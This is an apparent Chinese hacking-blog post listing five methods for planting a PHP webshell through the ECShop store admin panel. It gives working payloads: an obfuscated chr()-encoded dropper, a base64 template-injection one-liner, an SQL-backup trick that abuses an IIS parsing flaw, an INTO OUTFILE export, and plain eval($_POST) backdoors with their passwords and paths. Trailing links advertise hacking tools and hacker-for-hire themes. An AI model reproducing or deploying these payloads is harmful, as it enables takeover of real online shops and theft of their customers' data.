Ecshop后台拿shell *** (版本自测)

hacker5年前黑客文章872

*** 一、

进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php

*** 二、

后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:u ***

代码:

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr
(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr
(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr
(75).chr(33); @fclose($fp); ?>

*** 三、

进后台
选择模版管理 – 语言项编辑
搜索“用户信息” 在用户信息后面加上:

${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}}

然后确认修改, 访问根目录下user.php。在同目录下生成pcsli.php 一句话密码为:pcsli

*** 四、

用sql查询然后备份的 *** ,具体是找到数据库管理→SQL查询,然后执行SQL语句

建立新表 (ps:ECSHOP只调用了指定前缀的表 所以表名设为  ecs_cmd)

create table ecs_cmd(cmd text);

sasdfesgvgsdg 300x87 Ecshop后台拿shell方法(版本自测)

在新建立的表中插入一句话

insert into ecs_cmd(cmd) values(‘<php eval($_POST[cmd]);>’);

123we 300x84 Ecshop后台拿shell方法(版本自测)

在数据备份里面→点击自定义备份 可以看到我们新建立的表

45756855 300x83 Ecshop后台拿shell方法(版本自测)

选中它后直接备份名改成成x.php;(这是iis解析漏洞,如果是apache可以改成x.php.x.x.x) 就成功备份出来PHP一句话文件了 文件地址:chncto.com/data/sqldata/x.php;x.sql 直接上菜刀连接接即可

另外如果有root权限,也可以接着执行sql语句,导出一个shell

 select cmd from a into outfile ‘网站路径\eval.php’;

找网站路径可以用  use  数据库名;   或者有时也可以用 *** 三来爆出路径

*** 五、

后台–模版管理–库项目管理,选择一个库项目为myship.lbi-配送方式,在代码最下面插入php一句话木马:

<?php eval ($_POST[x]);?>

接着保存,一句话路径是:http://www.chncto.com/myship.php

标签: 黑客技术

相关文章

社会发展技术工程师工具箱

社会发展技术工程师工具箱

Social Engineer Toolkit 翻译中文可称:社会发展技术工程师工具箱;   什么是社会技术工程师工具箱? 由TrustedSec的创办人编写,社交媒体技术工程师工具箱(S...

Helix3Pro是不是完全免费?

Helix3Pro是不是完全免费?

什么叫Helix3 Pro? 如同之前的专用工具一样,Helix3 Pro是为计算机取证订制的与众不同专用工具。它早已十分细心地建立,以防止以一切方法触碰服务器,而且它是法医鉴定的。好的是Helix...

怎么教你怎么用黑客技术攻击网站&amp;nbsp;&amp;nbsp;分享8个强大的黑客技术学习网站

怎么教你怎么用黑客技术攻击网站&amp;nbsp;&amp;nbsp;分享8个强大的黑客技术学习网站

黑客攻击是一项很难掌握的技能,在很大的程度上要求人们对计算机和软件架构的各种概念和网络系统有深入的了解,今天,分享8个道德黑客学习可以利用的网站       黑客主要有两种:黑帽黑客、白帽...

黑客技术,黑客找赌博人合作

黑客技术,黑客找赌博人合作

一、技术黑客接单流程 1、接单方法他们不信任自愿合作和信息分享他们只喜欢控制的合作。技术找赌博人合作黑客在别人眼中是一件坏事,但黑客只是一个喜欢追求技术突破的人。他们擅长入侵、破解、攻击、社会攻击等等...

黑客攻击常常碰到的几类数据库查询

黑客攻击常常碰到的几类数据库查询

许多 小伙伴们爱看黑客攻击常常碰到的几类数据库查询,今日他来了,大家这儿沒有空话,仅有干货知识,是初学者黑客入门的首选之岛。 1、Oracle数据库查询 默认设置端口...

Ettercap是不是完全免费?

Ettercap是不是完全免费?

什么叫Ettercap? Ettercap是一种对外开放源码网络信息安全专用工具,适用中间人攻击局域网络的工作人员。它根据ARP中毒了计算机软件并将网线端口放置掺杂方式。因而,它能够 释放出来对其受...